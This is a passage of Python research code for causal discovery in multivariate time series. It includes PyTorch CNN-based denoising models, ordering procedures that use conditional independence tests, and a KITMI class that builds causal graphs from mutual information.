size after pooling?\n        )\n        # self.conv2 = nn.Sequential(\n        #     nn.Conv1d(\n        #         in_channels=16,\n        #         out_channels=8,\n        #         kernel_size=5,\n        #         stride=1,\n        #         padding=2,\n        #     ),\n        #     nn.ReLU(),\n        #     nn.MaxPool1d(kernel_size=2),\n        #\n        # )\n        # self.compact_out = nn.Linear(8, 1)\n        # self.out_1 = nn.Linear(input_size*2*2, input_size*2)\n        # self.out_2 = nn.Linear(input_size*2, input_size)\n        self.out = nn.Linear(input_size, output_size)\n\n    def forward(self, x_dict):\n        # print(x.size())\n        compact_ts_dict = dict()\n        names = list(x_dict.keys())\n        for name in names:\n            x = x_dict[name].view(-1, self.input_lag)\n            compact_ts_i = self.compact_ts(x)\n            compact_ts_dict[name] = compact_ts_i\n            if name == names[0]:\n                compact_ts = compact_ts_i\n            else:\n                compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n        compact_in = self.compact_in(compact_ts)\n        x = compact_in.view(-1, 1, 1)\n        x = self.conv1(x)\n        # print(x.size())\n        # x = self.conv2(x)\n        # x = x.view(-1, self.input_size*2*2)\n        x = x.view(-1, self.input_size)\n        # compact_out = self.compact_out(x)\n        # output = self.out(compact_out)\n        # x = self.out_1(x)\n        # x = self.out_2(x)\n        output = self.out(x)\n        return output, compact_in, compact_ts_dict\n\n\ndef train(input_dict, target_tensor, model, optimizer, criterion):\n\n    optimizer.zero_grad()\n    # model.zero_grad()\n\n    output, _, _ = model(input_dict)\n    loss = criterion(output, target_tensor)\n\n    loss.backward()\n    optimizer.step()\n    return loss.item()\n\n\ndef predict(input_dict, model):\n    output, compact_out, compact_ts_dict = model(input_dict)\n    return output, compact_out, compact_ts_dict\n\n\n# Function to produce noise\ndef add_noise(x, d, order, beta=0.5):\n    x = x.copy()\n    rand = np.random.randint(0, high=d, size=x.shape[0])\n    for j in range(d):\n        proba = np.random.random(size=1)\n        if proba > beta:\n            for o in range(order-1):\n                i = j + o*d\n                x[i, rand[j]] = 0\n    return x\n\n\ndef mts_order(mts, order=4):\n    new_mts = pd.DataFrame()\n    for i in range(order):\n        if i == order:\n            i_data = mts[i:]\n        else:\n            i_data = mts[i:(-order + i)]\n        if isinstance(mts, pd.DataFrame):\n            names_col = mts.columns.values+ \"_\" + str(i + 1)\n        elif isinstance(mts, pd.Series):\n            names_col = mts.name + \"_\" + str(i + 1)\n        else:\n            print('error!')\n            exit(0)\n        for j in range(len(names_col)):\n            new_mts[names_col[j]] = i_data[mts.columns.values[j]].values\n    return new_mts\n\n\ndef tskiko_mv(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n              verbose=True):\n    \"\"\"\n    :param data: input\n    :param max_lag: max_lag\n    :param learning_rate: learning rate of the autoencoder\n    :param training_epoch: number of training epochs\n    :param num_neurons: number of neurons in the hidden layer\n    :param noise: boolean value, if true a denoising autoencoder should be used\n    :param alpha:\n    :param cond_ind_test: CMI or ParCorr\n    :param verbose:\n    :return: dict\n    \"\"\"\n    # cond_ind_test = \"CMI\"\n    option = 1\n    # Start Causal ordering\n    start = time.time()\n\n    # scaler = MinMaxScaler(feature_range=(-1, 1))\n    # data = pd.DataFrame(scaler.fit_transform(data.values), columns=data.columns)\n    # data.columns = data.columns.values.astype(str)\n    d = data.shape[1]\n\n    x = mts_order(data, order=max_lag) # [:-order]\n    names_x = x.columns[:-d]\n    # names_x = x.columns\n    names_y = x.columns[-d:]\n    y = x[names_y]\n    x = x[names_x]\n\n    summary_names = list(data.columns)\n    temporal_names = dict()\n    for s in range(d):\n        temporal_names[summary_names[s]] = []\n        for o in range(max_lag - 1):\n            i = s + o * d\n            
temporal_names[summary_names[s]].append(names_x[i])\n\n cost_history = []\n indep_history = []\n test_indep_history = []\n\n x_train = x.copy()\n\n S = list(data.columns)\n sig = []\n pa = dict()\n for name in summary_names:\n pa[name] = []\n\n # todo compare each time series with its past\n for j in range(d-1):\n # if j != 0:\n # x_train.drop(temporal_names[selected], axis=1, inplace=True)\n # y.drop(y.columns[selected_loc], axis=1, inplace=True)\n # del S[selected_loc]\n criterion = nn.MSELoss()\n model = tsCNN(x_train.shape[1], y.shape[1], max_lag-1).to(device)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n n_epochs_stop = 100\n epochs_no_improve = 0\n min_loss = np.inf\n for iter in range(training_epoch + 1):\n # mini_batch_size = 5\n # N = x_train.shape[0] - 2\n # n_batch = N // mini_batch_size + (N % mini_batch_size != 0)\n # i_batch = (iter % N)\n if noise:\n x_train_n = add_noise(x_train.values, d=len(S), order=max_lag)\n else:\n x_train_n = x_train.values.copy()\n x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n input_dict = dict()\n for i in range(int(x_train_n.shape[1]/(max_lag-1))):\n input_tensor = torch.tensor(\n x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag-1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(\n # x_train_n.reshape(-1, x_train_n.shape[1], 1), dtype=torch.float,\n # device=device)\n target_tensor = torch.tensor(\n y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n device=device)\n\n loss = train(input_dict, target_tensor, model, optimizer, criterion)\n if loss < min_loss:\n min_loss = loss\n epochs_no_improve = 0\n else:\n epochs_no_improve = epochs_no_improve + 1\n if iter > 100 and epochs_no_improve == n_epochs_stop:\n if verbose:\n print('Early stopping!')\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n break\n\n if verbose:\n if iter % 250 == 0:\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n # if verbose:\n # if iter % 100 == 0:\n # print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n cost_history.append(loss)\n\n # k = d - 1 - j\n test_indep_values = []\n indep_values = []\n c = x_train.copy()\n input_dict = dict()\n for i in range(int(c.shape[1] / (max_lag - 1))):\n input_tensor = torch.tensor(\n c[temporal_names[S[i]]].values.reshape(-1, max_lag - 1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(c.values.reshape(c.shape[0], c.shape[1], 1), dtype=torch.float, device=device)\n res, compact_res, compact_ts_dict = predict(input_dict, model)\n res = res.detach().numpy()\n compact_res = compact_res.detach().numpy()\n for s in range(len(S)):\n # for o in range(order-1):\n # i = s + o*len(S)\n # c[:, i] = np.zeros((x_train.shape[0]))\n e = y.values[:, s] - res[:, s]\n # hs = TestHSIC(kernel='rbf')\n if cond_ind_test == \"ParCorr\":\n hs = TestParCorr()\n elif cond_ind_test == \"CMI\":\n hs = TestMI()\n # pval, val = hs.fit(compact_res, e, c[temporal_names[S[s]]])\n cond = compact_ts_dict[S[s]].detach().numpy()\n pval, val = hs.fit(compact_res, e, cond)\n # pval, val = hs.fit(compact_res, e)\n test_indep_values.append(pval)\n indep_values.append(abs(val))\n # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n indep_history.append(indep_values)\n test_indep_history.append(test_indep_values)\n # test_indep_array = np.array(test_indep_values).reshape(-1, 
len(S))\n test_indep_array = pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n # indep_array = np.array(indep_values).reshape(-1, len(S))\n indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n if test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n selected = indep_array.idxmin(axis=1).loc[0]\n if verbose:\n print(\"since all p-values are the same, we are looking at the statistics...\")\n print('indeps :' + str(indep_values))\n else:\n if verbose:\n print('test indeps :' + str(test_indep_values))\n selected = test_indep_array.idxmax(axis=1).loc[0]\n pval_init = test_indep_array[selected].loc[0]\n sig.insert(0, selected)\n\n pa[selected] = summary_names.copy()\n # pa[S[idp_init]].remove(S[idp_init])\n for name in sig:\n pa[selected].remove(name)\n selected_loc = test_indep_array.columns.get_loc(selected)\n\n c = x_train.copy()\n\n print(\"selected:\" +str(selected))\n print(\"candidate parents\" +str(pa[selected]))\n\n x_train.drop(temporal_names[selected], axis=1, inplace=True)\n y.drop(y.columns[selected_loc], axis=1, inplace=True)\n del S[selected_loc]\n\n if len(S) == 1:\n sig[0] = S[0]\n print(sig)\n\n end = time.time()\n discovery_time = end - start\n print('time causal discovery: '+str(discovery_time))\n\n print(pa)\n\n res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n for k in pa.keys():\n res_unit_array[k].loc[k] = 1\n temp = pa[k]\n for i in temp:\n # if k == i:\n # res_unit_array[i].loc[i] = 1\n # else:\n if res_unit_array[i].loc[k] == 0:\n res_unit_array[i].loc[k] = 1\n res_unit_array[k].loc[i] = 2\n\n return res_unit_array\n\n\n\n\n# Function to produce noise\ndef add_noise_nbcb_k(x, d, order, beta=0.5):\n x = x.copy()\n rand = np.random.randint(0, high=d, size=x.shape[0])\n for j in range(x.shape[0]):\n proba = np.random.random(size=1)\n if proba > beta:\n # for o in range(order-1):\n o = order-1\n i = rand[j] + o*d\n x[j, i] = 0\n return x\n\nclass tsCNN_nbcb_k(nn.Module):\n def __init__(self, input_size, output_size, input_lag):\n super(tsCNN_nbcb_k, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.input_lag = input_lag\n self.compact_ts = nn.Linear(input_lag, input_lag)\n self.compact_in = nn.Linear(int(input_size), input_size)\n # self.compact_in = nn.Linear(4, 2)\n self.conv1 = nn.Sequential(\n nn.Conv1d(\n in_channels=input_size,\n out_channels=input_size, # Some random number\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=2), # size after pooling?\n )\n self.out = nn.Linear(input_size, output_size)\n\n def forward(self, x_dict):\n compact_ts_dict = dict()\n names = list(x_dict.keys())\n for name in names:\n x = x_dict[name].view(-1, self.input_lag)\n compact_ts_i = self.compact_ts(x)\n compact_ts_dict[name] = compact_ts_i\n if name == names[0]:\n compact_ts = compact_ts_i\n else:\n compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n compact_in = self.compact_in(compact_ts)\n x = compact_in.view(-1, self.input_size, 1)\n x = self.conv1(x)\n x = x.view(-1, self.input_size)\n output = self.out(x)\n return output, compact_in, compact_ts_dict\n\n\ndef nbcb_k(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n verbose=True):\n \"\"\"\n :param data: input\n :param max_lag: max_lag\n :param learning_rate: learning rate of the autoencoder\n :param training_epoch: number of training epochs\n :param 
num_neurons: number of neurons in the hidden layer\n    :param noise: boolean value, if true a denoising autoencoder should be used\n    :param alpha:\n    :param cond_ind_test: CMI or ParCorr\n    :param verbose:\n    :return: dict\n    \"\"\"\n    # Start Causal ordering\n    start = time.time()\n\n    d = data.shape[1]\n\n    x = mts_order(data, order=max_lag) # [:-order]\n    # names_x = x.columns[:-d]\n    names_x = x.columns\n    names_y = x.columns[-d:]\n    y = x[names_y]\n    x = x[names_x]\n\n    summary_names = list(data.columns)\n    temporal_names = dict()\n    for s in range(d):\n        temporal_names[summary_names[s]] = []\n        for o in range(max_lag):\n            i = s + o * d\n            temporal_names[summary_names[s]].append(names_x[i])\n    cost_history = []\n    indep_history = []\n    test_indep_history = []\n\n    x_train = x.copy()\n\n    S = list(data.columns)\n    sig = []\n    pa = dict()\n    for name in summary_names:\n        pa[name] = []\n\n    for j in range(d-1):\n        criterion = nn.MSELoss()\n        model = tsCNN(x_train.shape[1], y.shape[1], max_lag).to(device)\n        optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n        n_epochs_stop = 100\n        epochs_no_improve = 0\n        min_loss = np.inf\n        for iter in range(training_epoch + 1):\n            if noise:\n                x_train_n = add_noise_nbcb_k(x_train.values, d=len(S), order=max_lag)\n            else:\n                x_train_n = x_train.values.copy()\n            x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n            input_dict = dict()\n            for i in range(int(x_train_n.shape[1]/(max_lag))):\n                input_tensor = torch.tensor(\n                    x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float,\n                    device=device)\n                input_dict[S[i]] = input_tensor\n            target_tensor = torch.tensor(\n                y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n                device=device)\n\n            loss = train(input_dict, target_tensor, model, optimizer, criterion)\n            if loss < min_loss:\n                min_loss = loss\n                epochs_no_improve = 0\n            else:\n                epochs_no_improve = epochs_no_improve + 1\n            if iter > 100 and epochs_no_improve == n_epochs_stop:\n                if verbose:\n                    print('Early stopping!')\n                    print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n                break\n\n            if verbose:\n                if iter % 250 == 0:\n                    print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n            # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n            # if verbose:\n            #     if iter % 100 == 0:\n            #         print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n            cost_history.append(loss)\n\n        test_indep_values = []\n        indep_values = []\n        # k = d - 1 - j\n        for s in range(len(S)):\n            c = x_train.copy()\n            input_dict = dict()\n            list_other = []\n            for i in range(int(c.shape[1] / (max_lag))):\n                if i == s:\n                    print(temporal_names[S[i]][-1])\n                    print(c[temporal_names[S[i]]])\n                    c[temporal_names[S[i]][-1]] = np.zeros((c.shape[0]))\n                    # c[temporal_names[S[i]]][temporal_names[S[i]]] = np.zeros((len(temporal_names[S[i]])))\n                    print(c[temporal_names[S[i]]])\n                    input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n                    input_dict[S[i]] = input_tensor\n                else:\n                    list_other.append(i)\n                    input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n                    input_dict[S[i]] = input_tensor\n\n            res, compact_res, compact_ts_dict = predict(input_dict, model)\n            res = res.detach().numpy()\n            compact_res = compact_res.detach().numpy()\n            e = y.values[:, s] - res[:, s]\n            if cond_ind_test == \"ParCorr\":\n                hs = TestParCorr()\n            elif cond_ind_test == \"CMI\":\n                hs = TestMI()\n\n            other = 
compact_ts_dict[S[list_other[0]]].detach().numpy()\n            cond = compact_ts_dict[S[s]].detach().numpy()\n\n            pval, val = hs.fit(other, e, cond)\n            # pval, val = hs.fit(compact_res, e)\n            test_indep_values.append(pval)\n            indep_values.append(abs(val))\n            # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n        indep_history.append(indep_values)\n        test_indep_history.append(test_indep_values)\n        # test_indep_array = np.array(test_indep_values).reshape(-1, len(S))\n        test_indep_array = pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n        # indep_array = np.array(indep_values).reshape(-1, len(S))\n        indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n        if test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n            selected = indep_array.idxmin(axis=1).loc[0]\n            if verbose:\n                print(\"since all p-values are the same, we are looking at the statistics...\")\n                print('indeps :' + str(indep_values))\n        else:\n            if verbose:\n                print('test indeps :' + str(test_indep_values))\n            selected = test_indep_array.idxmax(axis=1).loc[0]\n        sig.insert(0, selected)\n\n        pa[selected] = summary_names.copy()\n        # pa[S[idp_init]].remove(S[idp_init])\n        for name in sig:\n            pa[selected].remove(name)\n        selected_loc = test_indep_array.columns.get_loc(selected)\n\n        c = x_train.copy()\n\n        print(\"selected:\" +str(selected))\n        print(\"candidate parents\" +str(pa[selected]))\n\n        x_train.drop(temporal_names[selected], axis=1, inplace=True)\n        y.drop(y.columns[selected_loc], axis=1, inplace=True)\n        del S[selected_loc]\n\n    if len(S) == 1:\n        sig[0] = S[0]\n    print(sig)\n\n    end = time.time()\n    discovery_time = end - start\n    print('time causal discovery: '+str(discovery_time))\n\n    print(pa)\n\n    res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n    for k in pa.keys():\n        res_unit_array[k].loc[k] = 1\n        temp = pa[k]\n        for i in temp:\n            # if k == i:\n            #     res_unit_array[i].loc[i] = 1\n            # else:\n            if res_unit_array[i].loc[k] == 0:\n                res_unit_array[i].loc[k] = 1\n                res_unit_array[k].loc[i] = 2\n\n    return res_unit_array\n\n\nclass Graph:\n    \"\"\"\n    Graph structure\n    0: no edge\n    1: a tail -\n    2: arrow head ->\n    \"\"\"\n    def __init__(self, d):\n        \"\"\"\n        :param d: number of nodes\n        \"\"\"\n        self.d = d\n        # self.edges = np.subtract(np.ones([n, n]), np.eye(n))\n        self.edges = np.ones([d, d])\n        self.sep = np.zeros([d, d, d])\n\n    def del_edge(self, p, q):\n        \"\"\"\n        :param p: index of a time series\n        :param q: index of a time series\n        \"\"\"\n        self.edges[p, q] = 0\n        self.edges[q, p] = 0\n\n    def add_sep(self, p, q, r):\n        \"\"\"\n        :param p: index of a time series\n        :param q: index of a time series\n        :param r: index of separation set\n        \"\"\"\n        self.sep[p, q, r] = 1\n        self.sep[q, p, r] = 1\n\n    def search_adj(self, p):\n        \"\"\"\n        :param p: index of a time series\n        :return: list of adjacencies of time series p and the number of adjacencies\n        \"\"\"\n        adj_1 = np.argwhere(self.edges[p, :] != 0)\n        adj_2 = np.argwhere(self.edges[:, p] != 0)\n        adj = np.intersect1d(adj_1, adj_2)\n        if self.edges[p, p] == 1:\n            adj = adj[adj != p]\n        num_adj = len(adj)\n        return adj, num_adj\n\n    def search_adj_all(self):\n        \"\"\"\n        :return: list of adjacencies of all time series and the number of adjacencies per time series\n        \"\"\"\n        l_num_adj = []\n        l_adj = []\n        for p in range(self.d):\n            adj, num_adj = self.search_adj(p)\n            l_adj.append(adj.tolist())\n            l_num_adj.append(num_adj)\n        return l_adj, l_num_adj\n\n\nclass RankingList:\n    def __init__(self):\n        self.val = 
np.array([])\n self.elem_p = np.array([], dtype='int')\n self.elem_q = np.array([], dtype='int')\n self.elem_r = []\n\n def add(self, p, q, val, r):\n \"\"\"\n :param p: index of a time series\n :param q: index of a time series\n :param val: value of mutual information\n :param r: index of set of conditionals\n \"\"\"\n self.val = np.append(self.val, val)\n self.elem_p = np.append(self.elem_p, p)\n self.elem_q = np.append(self.elem_q, q)\n self.elem_r.append(r)\n\n def sort(self, descending=True):\n \"\"\"\n :param descending: (bool) sort ascending vs. descending. By default True\n \"\"\"\n idx = np.argsort(self.val)\n if descending:\n idx = np.flip(idx)\n # self.val = self.val[idx]\n # self.elem_p = self.elem_p[idx]\n # self.elem_q = self.elem_q[idx]\n # self.elem_r = self.elem_r[idx]\n self.val = np.take_along_axis(self.val, idx, axis=0)\n self.elem_p = np.take_along_axis(self.elem_p, idx, axis=0)\n self.elem_q = np.take_along_axis(self.elem_q, idx, axis=0)\n sorted_elem_r = []\n for i in idx:\n sorted_elem_r.append(self.elem_r[i])\n self.elem_r = sorted_elem_r\n\n\nclass KITMI:\n def __init__(self, series, sig_lev=0.05, lag_max=5, p_value=True, rank_using_p_value=False, verbose=True, num_processor=-1,\n graphical_optimization=True):\n \"\"\"\n Causal inference (Wrapper) using TMI and CTMI (contain functions for skeleton construction)\n :param series: d-time series (with possibility of different sampling rate)\n :param sig_lev: significance level. By default 0.05\n :param p_value: Use p_value for decision making. By default True\n :param verbose: Print results. By default: True\n :param num_processor: number of processors for parallelization. By default -1 (all)\n \"\"\"\n self.series = series\n self.graph = Graph(series.shape[1])\n\n training_epoch = 1000\n noise = True # d*(order-1)*2\n learning_rate = 0.01\n for i in range(series.shape[1]):\n for j in range(i+1, series.shape[1]):\n data_pair = series[[series.columns[i], series.columns[j]]]\n res_order_pair = tskiko_mv(data_pair, lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n if res_order_pair[series.columns[j]].loc[series.columns[i]] == 2:\n self.graph.edges[i, j] = 2\n if res_order_pair[series.columns[i]].loc[series.columns[j]] == 2:\n self.graph.edges[j, i] = 2\n # self.graph.edges = tskiko_mv(self.series[[series.columns[0], series.columns[1]]], lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n\n if verbose:\n print(\"Order\")\n print(self.graph.edges)\n\n\n self.series = series\n # # self.graph = Graph(series.shape[1])\n self.n = series.shape[0]\n self.d = series.shape[1]\n self.names = self.series.columns\n self.num_processor = num_processor\n self.p_value = p_value\n self.verbose = verbose\n self.sig_lev = sig_lev\n\n self.adaptive_window = True\n self.graphical_optimization = graphical_optimization\n if self.p_value == rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n elif not rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n else:\n print(\"Warning: rank_using_p_value can be True iff p_value is True. 
Using rank_using_p_value=False\")\n            self.rank_using_p_value = False\n\n        self.data_dict = dict()\n        self.instantaneous_dict = dict()\n\n        self.lags = []\n        self.sampling_rate = dict()\n        for col in range(series.shape[1]):\n            _, s_r = get_sampling_rate(self.series[self.names[col]])\n            self.sampling_rate[self.names[col]] = s_r\n\n        self.alpha = get_alpha(series)\n\n        for col in range(series.shape[1]):\n            # self.lags.append(window_size(series[series.columns[col]], alpha=self.alpha, lag_max=lag_max))\n            if not self.adaptive_window:\n                self.lags.append(1)\n                self.data_dict[self.names[col]] = window_representation(self.series[self.names[col]],\n                                                                        windows_size=self.lags[col])\n            self.instantaneous_dict[self.names[col]] = True\n\n        if self.adaptive_window:\n            self.gamma_matrix, self.window_matrix = self.gamma_matrix_window_matrix(self.series, series.columns)\n        else:\n            self.gamma_matrix = align_matrix(self.data_dict, series.columns, self.sampling_rate)\n\n        self.cap_gamma_df = pd.DataFrame(columns=[\"p\", \"q\", \"r\", \"Grp\", \"Grq\"])\n\n        self.mi_array = np.ones([self.graph.d, self.graph.d])\n        self.cmi_array = np.ones([self.graph.d, self.graph.d])\n\n        if self.verbose:\n            print(\"n: \"+str(self.n))\n            print(\"d: \"+str(self.d))\n            print(\"names: \"+str(self.names))\n            print(\"sampling_rate: \"+str(self.sampling_rate))\n            print(\"significance level:\"+str(self.sig_lev))\n            print(\"alpha:\"+str(self.alpha))\n            print(\"window size:\"+str(self.lags))\n            print(\"gamma matrix:\"+str(self.gamma_matrix))\n            if self.adaptive_window:\n                print(\"window matrix\"+str(self.window_matrix))\n            print(\"instantaneous dict :\"+str(self.instantaneous_dict))\n            print(\"Order\")\n            print(self.graph.edges)\n\n    def find_gamma_lambda_x_y(self, x, y, k=10, max_gamma=5):\n        gamma_list = list(range(1, max_gamma))\n        # todo add windows\n        # ws_x_list = list(range(1, max_gamma - 2))\n        # ws_y_list = list(range(1, max_gamma - 2))\n        ws_x_list = [1]\n        ws_y_list = [1]\n\n        c = np.zeros([len(gamma_list), len(ws_x_list), len(ws_y_list)])\n\n        for idx_g in range(len(gamma_list)):\n            for idx_ws_x in range(len(ws_x_list)):\n                x_w_rep = window_representation(x, windows_size=ws_x_list[idx_ws_x])\n                for idx_ws_y in range(len(ws_y_list)):\n                    # if ws_x_list[idx_ws_x] == ws_y_list[idx_ws_y] == 1:\n                    y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n                    g = gamma_list[idx_g]\n\n                    if g > 0:\n                        y_w_rep = y_w_rep[g:]\n                        x_w_rep = x_w_rep.reset_index(drop=True)\n                        y_w_rep = y_w_rep.reset_index(drop=True)\n\n                        x_w_rep = x_w_rep[:-g]\n                        x_w_rep = x_w_rep.reset_index(drop=True)\n                        y_w_rep = y_w_rep.reset_index(drop=True)\n                    m = min(x_w_rep.shape[0], y_w_rep.shape[0])\n                    x_w_rep = x_w_rep[:m]\n                    y_w_rep = y_w_rep[:m]\n                    if len(x_w_rep.shape) == 1:\n                        x_w_rep = x_w_rep.to_frame()\n                    if len(y_w_rep.shape) == 1:\n                        y_w_rep = y_w_rep.to_frame()\n                    cmi = TestMI(p_value=False)\n                    _, val = cmi.fit(x_w_rep, y_w_rep)\n\n                    c[idx_g, idx_ws_x, idx_ws_y] = val\n                    # else:\n                    #     if ws_x_list[idx_ws_x] != ws_y_list[idx_ws_y]:\n                    #         y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n                    #         g = gamma_list[idx_g]\n                    #         _, val = tmi(x_w_rep, y_w_rep, sampling_rate_tuple, k=k, gamma=g, p_value=False)\n                    #         c[idx_g, idx_ws_x, idx_ws_y] = val\n                    #     else:\n                    #         c[idx_g, idx_ws_x, idx_ws_y] = 0\n\n        idx_g, idx_ws_x, idx_ws_y = np.where(c == np.max(c))\n        idx_g = idx_g[0]\n        idx_ws_x = idx_ws_x[0]\n        idx_ws_y = idx_ws_y[0]\n        g = gamma_list[idx_g]\n        ws_x = ws_x_list[idx_ws_x]\n        ws_y = ws_y_list[idx_ws_y]\n        return g, ws_x, ws_y\n\n    def gamma_matrix_window_matrix(self, series, keys, k=10, max_gamma=5):\n        d = 
len(keys)\n g_matrix = np.zeros([d, d], dtype=int)\n window_matrix = np.zeros([d, d], dtype=list)\n\n for i in range(d):\n for j in range(d):\n if i != j:\n x = series[keys[i]]\n y = series[keys[j]]\n g, ws_x, ws_y = self.find_gamma_lambda_x_y(x, y, k=k, max_gamma=max_gamma)\n g_matrix[i, j] = g\n window_matrix[i, j] = [ws_x, ws_y]\n # window_matrix[j, i] = ws_y\n else:\n g_matrix[i, j] = 1\n window_matrix[i, j] = [1, 1]\n # window_matrix[j, i] = 1\n return pd.DataFrame(g_matrix, columns=keys, index=keys), pd.DataFrame(window_matrix, columns=keys, index=keys)\n\n def align_pq(self, x, y, gamma):\n x = x.loc[y.index[0]:]\n\n idx_x = x.index\n idx_y = y.index\n if gamma > 0:\n y = y[gamma:]\n idx_y = idx_y[gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n idx_x = idx_x[x.index]\n idx_y = idx_y[y.index]\n\n x = x[:-gamma]\n idx_x = idx_x[:-gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n else:\n print(\"Error: gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0])\n x = x[:m]\n y = y[:m]\n idx_x = idx_x[:m]\n idx_y = idx_y[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n return x, y, idx_x, idx_y\n\n def find_gamma_z_xy_util(self, x, y, z, k, Gamma, sig_samples=10000, measure=\"cmiknn\"):\n if Gamma > 0:\n x = x[Gamma:]\n y = y[Gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n\n z = z[:-Gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n else:\n print(\"Error: Gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0], z.shape[0])\n x = x[:m]\n y = y[:m]\n z = z[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n if len(z.shape) == 1:\n z = z.to_frame()\n\n cmi = TestMI(p_value=False)\n _, cmi_val = cmi.fit(x, y, z)\n return cmi_val\n\n def find_gamma_z_xy(self, x, y, z, k, max_gamma=5, measure=\"cmiknn\"):\n z = z.loc[y.index[0]:]\n\n c1 = list()\n\n c1.append(1)\n for G in range(1, max_gamma):\n val = self.find_gamma_z_xy_util(x, y, z, k=k, Gamma=G, measure=measure)\n c1.append(val)\n\n G = np.argmin(c1) + 1\n return G\n\n def align_pqr(self, v_p, v_q, idx_q, r, k):\n\n names_r = [*r.keys()]\n v_r = dict()\n nr_visted = []\n\n for nr in names_r:\n # idx_pq = idx_q\n\n v_p_new = v_p.copy()\n v_q_new = v_q.copy()\n v_p_new.index = idx_q\n v_q_new.index = idx_q\n g = self.find_gamma_z_xy(v_p_new, v_q_new, r[nr], k, max_gamma=5, measure=\"cmiknn\")\n print(\"Gamma = \" + str(g))\n # nr_processed = r[nr]\n\n # xyz_dict = {name_q: v_p_new, nr: nr_processed}\n # xyz_dict[name_q].index = idx_pq\n\n bool_idx = pd.DataFrame([False] * len(idx_q), columns=['bool'])\n bool_idx.index = idx_q\n\n v_q, r_processed, idx_q, _ = self.align_pq(v_q_new, r[nr], g)\n bool_idx.loc[idx_q] = True\n bool_idx = bool_idx['bool'].values\n v_p = v_p[bool_idx]\n # idx_p = idx_p[bool_idx]\n\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v][bool_idx]\n v_r[nr] = r_processed\n nr_visted.append(nr)\n\n v_p = v_p.reset_index(drop=True)\n v_q = v_q.reset_index(drop=True)\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v].reset_index(drop=True)\n\n return v_p, v_q, v_r\n\n def causation_entropy(self, p, q, r_list=[], k=10):\n gamma = self.gamma_matrix[self.names[q]].loc[self.names[p]]\n pt_1 = self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n pt_1, qt, idx_p, idx_q = self.align_pq(pt_1, qt, gamma)\n\n # qt = q.iloc[1:].values\n # pt_1 = p.iloc[:-1].values\n if 
